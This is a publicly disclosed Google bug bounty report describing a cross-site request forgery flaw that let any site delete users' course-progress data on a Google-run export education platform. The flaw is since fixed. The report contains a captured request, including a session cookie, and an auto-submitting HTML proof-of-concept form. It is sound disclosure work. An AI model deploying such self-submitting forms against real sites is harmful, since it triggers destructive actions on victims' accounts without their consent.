Skip to Content (Press Enter)
Google
Bug Hunters
A csrf in exporteducationprogram.googlecnapps.cn  leads to deleting  user data
Reported by:
akihi
Google VRP
triaged
18:16 | Dec 30, 2021
accepted
19:21 | Dec 31, 2021
fixed
23:42 | Aug 2, 2022
reward decided
$100
Summary:
A csrf in exporteducationprogram.googlecnapps.cn  leads to deleting  user data
The vulnerability is known to third parties!
Product:
Grow
URL:
https://exporteducationprogram.googlecnapps.cn/
Vulnerability type:
Cross-site request forgery (CSRF)
Details
a csrf  in exporteducationprogram.googlecnapps.cn  leads  to deleting user data
relevant url:
https://exporteducationprogram.googlecnapps.cn/appacademy/home?utm_source=wechat&utm_medium=wechat_menu_bar&utm_campaign=ewg_online_training_platform&openid=oQJ0wsxRtjc-I6r6NelZ6swbgCrk
click the button
Delete Data
in that page, the request package can be captured as follows:
POST /appacademy/api/clear HTTP/1.1
Host: exporteducationprogram.googlecnapps.cn
Connection: close
Content-Length: 2
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Accept: application/json, text/plain,
/
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin:
https://exporteducationprogram.googlecnapps.cn
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
https://exporteducationprogram.googlecnapps.cn/appacademy/home?utm_source=wechat&utm_medium=wechat_menu_bar&utm_campaign=ewg_online_training_platform&openid=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7
Cookie: aa-session="eyJhYV9pc19lbnJvbGwiOnRydWUsImFhX3VzZXJfaWQiOiI1OTQ1ODk0MTU1MzIxMzQ0IiwiYWFfaXNfd2hpdGVsaXN0IjpmYWxzZX0\075|1640841511|591ee02f37f3fe7e7c36111cb1bb5927c32cad47"
{}
'
It is vulnerable to a csrf, and the poc:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://exporteducationprogram.googlecnapps.cn/appacademy/api/clear" method="POST">
    <input id="submit0" type="submit" value="Submit request" />
      <script> window.onload=function(){

                document.getElementById("submit0").click();

                }     
        </script>
         </form>
</html>
user visit other websites which have evil html like the csrf poc , and then user data like Course learning progress data on this website will be deleted. It will give bad experience on user.
Attack scenario
user visit other websites which have evil html like the csrf poc , and then user data like Course learning progress data on this website will be deleted. It will give bad experience on user.
登录
使用 Google 账号登录